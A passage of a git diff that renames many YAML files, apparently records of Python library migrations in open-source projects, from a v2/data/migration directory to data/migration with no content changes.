v2/data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml rename to data/migration/ipaddr__py2-ipaddress__evgeni@bley__dcc4285.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml b/data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml similarity index 100% rename from v2/data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml rename to data/migration/ipaddr__py2-ipaddress__jdswinbank@comet__1549e86.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml b/data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml similarity index 100% rename from v2/data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml rename to data/migration/ipaddr__py2-ipaddress__magic-wormhole@magic-wormhole__5b23669.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml b/data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml similarity index 100% rename from v2/data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml rename to data/migration/ipaddr__py2-ipaddress__meejah@txtorcon__c8fdba0.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml b/data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml similarity index 100% rename from v2/data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml rename to data/migration/ipaddr__py2-ipaddress__redhat-cip@hardware__a429c38.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml b/data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml similarity index 100% rename from v2/data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml rename to data/migration/ipaddr__py2-ipaddress__rvojcik@rtapi__2c25c05.yaml diff --git a/v2/data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml b/data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml similarity index 100% rename from v2/data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml rename to data/migration/ipaddr__py2-ipaddress__stackstorm@st2__4022aea.yaml diff --git a/v2/data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml b/data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml similarity index 100% rename from v2/data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml rename to data/migration/ipaddress__netaddr__napalm-automation@napalm__085994a.yaml diff --git a/v2/data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml b/data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml similarity index 100% rename from v2/data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml rename to data/migration/jsonpath-rw__jsonpath-rw-ext__hxlstandard@libhxl-python__0babff2.yaml diff --git a/v2/data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml b/data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml similarity index 100% rename from v2/data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml rename to data/migration/jsontableschema__tableschema__frictionlessdata@tableschema-sql-py__a1385f7.yaml diff --git a/v2/data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml b/data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml similarity index 100% rename from v2/data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml rename to data/migration/kafka-python__confluent-kafka__biznetgio@restknot__6b10345.yaml diff --git a/v2/data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml b/data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml similarity index 100% rename from v2/data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml rename to data/migration/kafka-python__confluent-kafka__openstack@oslo.messaging__5a842ae.yaml diff --git a/v2/data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml b/data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml similarity index 100% rename from v2/data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml rename to data/migration/kafka__confluent-kafka__svenskaspel@locust-plugins__fad53da.yaml diff --git a/v2/data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml b/data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml similarity index 100% rename from v2/data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml rename to data/migration/leveldb__plyvel__ethereum@py-evm__5c273ff.yaml diff --git a/v2/data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml b/data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml similarity index 100% rename from v2/data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml rename to data/migration/leveldb__plyvel__gdassori@spruned__4326c64.yaml diff --git a/v2/data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml b/data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml similarity index 100% rename from v2/data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml rename to data/migration/leveldb__plyvel__obsidianforensics@hindsight__973b3d3.yaml diff --git a/v2/data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml b/data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml similarity index 100% rename from v2/data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml rename to data/migration/lockfile__fasteners__kizniche@mycodo__547f6d9.yaml diff --git a/v2/data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml b/data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml similarity index 100% rename from v2/data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml rename to data/migration/lockfile__fasteners__paratoolsinc@taucmdr__2a2c28a.yaml diff --git a/v2/data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml b/data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml similarity index 100% rename from v2/data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml rename to data/migration/lockfile__fasteners__samschott@maestral__e4388ee.yaml diff --git a/v2/data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml b/data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml similarity index 100% rename from v2/data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml rename to data/migration/logbook__loguru__thombashi@sqlitebiter__311c7ce.yaml diff --git a/v2/data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml b/data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml similarity index 100% rename from v2/data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml rename to data/migration/logbook__loguru__thombashi@tcconfig__7ba8676.yaml diff --git a/v2/data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml b/data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml similarity index 100% rename from v2/data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml rename to data/migration/logger__logging__prtg@pythonminiprobe__2b6a1ae.yaml diff --git a/v2/data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml b/data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml similarity index 100% rename from v2/data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml rename to data/migration/lxml__defusedxml__haiwen@seafdav__5e1291f.yaml diff --git a/v2/data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml b/data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml similarity index 100% rename from v2/data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml rename to data/migration/lxml__defusedxml__openvinotoolkit@open_model_zoo__7c2529f.yaml diff --git a/v2/data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml b/data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml similarity index 100% rename from v2/data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml rename to data/migration/lxml__defusedxml__synacktiv@eos__ac9596f.yaml diff --git a/v2/data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml b/data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml similarity index 100% rename from v2/data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml rename to data/migration/m2crypto__cryptography__kevoreilly@capev2__abf58a7.yaml diff --git a/v2/data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml b/data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml similarity index 100% rename from v2/data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml rename to data/migration/m2crypto__cryptography__yubico@python-u2flib-server__65c4665.yaml diff --git a/v2/data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml b/data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml similarity index 100% rename from v2/data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml rename to data/migration/mechanize__requests__jorgecarleitao@public-contracts__70a229c.yaml diff --git a/v2/data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml b/data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml similarity index 100% rename from v2/data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml rename to data/migration/migrate__alembic__kickstandproject@payload__ffeff6a.yaml diff --git a/v2/data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml b/data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml similarity index 100% rename from v2/data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml rename to data/migration/models__model__hwwang55@gcn-lpa__7a97486.yaml diff --git a/v2/data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml b/data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml similarity index 100% rename from v2/data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml rename to data/migration/msgpack__u-msgpack-python__crossbario@autobahn-python__9e00896.yaml diff --git a/v2/data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml b/data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml similarity index 100% rename from v2/data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml rename to data/migration/msgpack__u-msgpack-python__kushalp@serfclient-py__3adbf0f.yaml diff --git a/v2/data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml b/data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml similarity index 100% rename from v2/data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml rename to data/migration/multiprocess__multiprocessing__axelrod-python@axelrod__70f3a35.yaml diff --git a/v2/data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml b/data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml similarity index 100% rename from v2/data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml rename to data/migration/multiprocess__multiprocessing__intelpni@brainiak__e62dc1d.yaml diff --git a/v2/data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml b/data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml similarity index 100% rename from v2/data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml rename to data/migration/multiprocess__multiprocessing__markovmodel@msmtools__a3a152e.yaml diff --git a/v2/data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml b/data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml similarity index 100% rename from v2/data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml rename to data/migration/multiprocessing__multiprocess__czheo@syntax_sugar_python__1dbc1d4.yaml diff --git a/v2/data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml b/data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml similarity index 100% rename from v2/data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml rename to data/migration/multiprocessing__multiprocess__jhsmit@colicoords__a082ad5.yaml diff --git a/v2/data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml b/data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml similarity index 100% rename from v2/data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml rename to data/migration/napalm-base__napalm__afourmy@e-napalm__1033665.yaml diff --git a/v2/data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml b/data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml similarity index 100% rename from v2/data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml rename to data/migration/netaddr__ipaddress__ovirt@vdsm__6eef802.yaml diff --git a/v2/data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml b/data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml similarity index 100% rename from v2/data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml rename to data/migration/netaddr__py2-ipaddress__jimfunk@django-postgresql-netfields__a5a1118.yaml diff --git a/v2/data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml b/data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml similarity index 100% rename from v2/data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml rename to data/migration/netaddr__py2-ipaddress__nitmir@policyd-rate-limit__c024e06.yaml diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml b/data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml similarity index 100% rename from v2/data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml rename to data/migration/neutron__neutron-lib__openstack@networking-bagpipe__4bb14fa.yaml diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml b/data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml similarity index 100% rename from v2/data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml rename to data/migration/neutron__neutron-lib__openstack@networking-fortinet__2365dcb.yaml diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml b/data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml similarity index 100% rename from v2/data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml rename to data/migration/neutron__neutron-lib__openstack@networking-generic-switch__c6f4b71.yaml diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml b/data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml similarity index 100% rename from v2/data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml rename to data/migration/neutron__neutron-lib__openstack@networking-nec__ff1695d.yaml diff --git a/v2/data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml b/data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml similarity index 100% rename from v2/data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml rename to data/migration/neutron__neutron-lib__openstack@networking-odl__a40b9d9.yaml diff --git a/v2/data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml b/data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml similarity index 100% rename from v2/data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml rename to data/migration/node-semver__semantic-version__openstack@solar__8766f11.yaml diff --git a/v2/data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml b/data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml similarity index 100% rename from v2/data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml rename to data/migration/oauth2__oauthlib__discogs@discogs_client__c56f61a.yaml diff --git a/v2/data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml b/data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml similarity index 100% rename from v2/data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml rename to data/migration/openpyxl__xlsxwriter__bcgov@gwells__57d12c4.yaml diff --git a/v2/data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml b/data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml similarity index 100% rename from v2/data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml rename to data/migration/openstackclient__osc-lib__openstack@deb-python-ironic-inspector-client__c25d73e.yaml diff --git a/v2/data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml b/data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml similarity index 100% rename from v2/data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml rename to data/migration/openstackclient__osc-lib__openstack@deb-python-muranoclient__e3a2b68.yaml diff --git a/v2/data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml b/data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml similarity index 100% rename from v2/data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml rename to data/migration/openstackclient__osc-lib__openstack@python-searchlightclient__0bc93d1.yaml diff --git a/v2/data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml b/data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml similarity index 100% rename from v2/data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml rename to data/migration/paramiko__fabric__aws@aws-parallelcluster__d49460a.yaml diff --git a/v2/data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml b/data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml rename to data/migration/pep8__pycodestyle__cyberbotics@urdf2webots__723168d.yaml diff --git a/v2/data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml b/data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml rename to data/migration/pep8__pycodestyle__fabioz@PyDev.Debugger__d535c19.yaml diff --git a/v2/data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml b/data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml rename to data/migration/pep8__pycodestyle__hhatto@autopep8__3e1c196.yaml diff --git a/v2/data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml b/data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml rename to data/migration/pep8__pycodestyle__nchammas@flintrock__7323298.yaml diff --git a/v2/data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml b/data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml rename to data/migration/pep8__pycodestyle__openstack@designate__2c9e9f5.yaml diff --git a/v2/data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml b/data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml rename to data/migration/pep8__pycodestyle__openstack@sahara__61b0b2e.yaml diff --git a/v2/data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml b/data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml similarity index 100% rename from v2/data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml rename to data/migration/pep8__pycodestyle__schlamar@flake8-todo__fcd59c6.yaml diff --git a/v2/data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml b/data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml similarity index 100% rename from v2/data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml rename to data/migration/pil__pillow__rcos@observatory-retired__f970b54.yaml diff --git a/v2/data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml b/data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml similarity index 100% rename from v2/data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml rename to data/migration/pil__pillow__shoebot@shoebot__0171fb9.yaml diff --git a/v2/data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml b/data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml similarity index 100% rename from v2/data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml rename to data/migration/prettytable__tabulate__educationaltestingservice@skll__f870a65.yaml diff --git a/v2/data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml b/data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml similarity index 100% rename from v2/data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml rename to data/migration/progressbar__tqdm__ozencb@yts-scraper__383401a.yaml diff --git a/v2/data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml b/data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml similarity index 100% rename from v2/data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml rename to data/migration/progressbar__tqdm__redkyn@assigner__f132d03.yaml diff --git a/v2/data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml b/data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml similarity index 100% rename from v2/data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml rename to data/migration/progressbar__tqdm__rivuletstudio@rivuletpy__52068ad.yaml diff --git a/v2/data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml b/data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml similarity index 100% rename from v2/data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml rename to data/migration/progressbar__tqdm__wkentaro@fcn__399069a.yaml diff --git a/v2/data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml b/data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml similarity index 100% rename from v2/data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml rename to data/migration/py-bcrypt__bcrypt__weasyl@weasyl__f6230c7.yaml diff --git a/v2/data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml b/data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml similarity index 100% rename from v2/data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml rename to data/migration/pyandoc__pypandoc__hustlzp@permission__d174a21.yaml diff --git a/v2/data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml b/data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml similarity index 100% rename from v2/data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml rename to data/migration/pycrypto__cryptography__freeopcua@opcua-asyncio__cdaff15.yaml diff --git a/v2/data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml b/data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml similarity index 100% rename from v2/data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml rename to data/migration/pycrypto__pycryptodome__camptocamp@c2cgeoportal__14388c3.yaml diff --git a/v2/data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml b/data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml similarity index 100% rename from v2/data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml rename to data/migration/pycrypto__pycryptodome__hhyo@archery__e192ca6.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml b/data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml rename to data/migration/pycryptodome__cryptography__allencellmodeling@cookiecutter-pypackage__8d172cb.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml b/data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml rename to data/migration/pycryptodome__cryptography__apache@libcloud__a68022d.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml b/data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml rename to data/migration/pycryptodome__cryptography__cloudve@cloudbridge__27b217e.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml b/data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml rename to data/migration/pycryptodome__cryptography__coresecurity@pysap__21fe13a.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml b/data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml rename to data/migration/pycryptodome__cryptography__jvanovost@dc09_spt__08a9d0b.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml b/data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml rename to data/migration/pycryptodome__cryptography__leifj@pyxmlsecurity__b5d88c8.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml b/data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml rename to data/migration/pycryptodome__cryptography__mitya57@secretstorage__e637c3b.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml b/data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml rename to data/migration/pycryptodome__cryptography__ojarva@python-sshpubkeys__e3ee2d2.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml b/data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml rename to data/migration/pycryptodome__cryptography__openstack@glance__5ebde90.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml b/data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml rename to data/migration/pycryptodome__cryptography__openstack@keystonemiddleware__e23cb36.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml b/data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml rename to data/migration/pycryptodome__cryptography__privacyidea@privacyidea__bcd8a45.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml b/data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml rename to data/migration/pycryptodome__cryptography__rev112@pyope__48c294a.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml b/data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml rename to data/migration/pycryptodome__cryptography__secdev@scapy__c24298b.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml b/data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml rename to data/migration/pycryptodome__cryptography__spockbotmc@spockbot__4442170.yaml diff --git 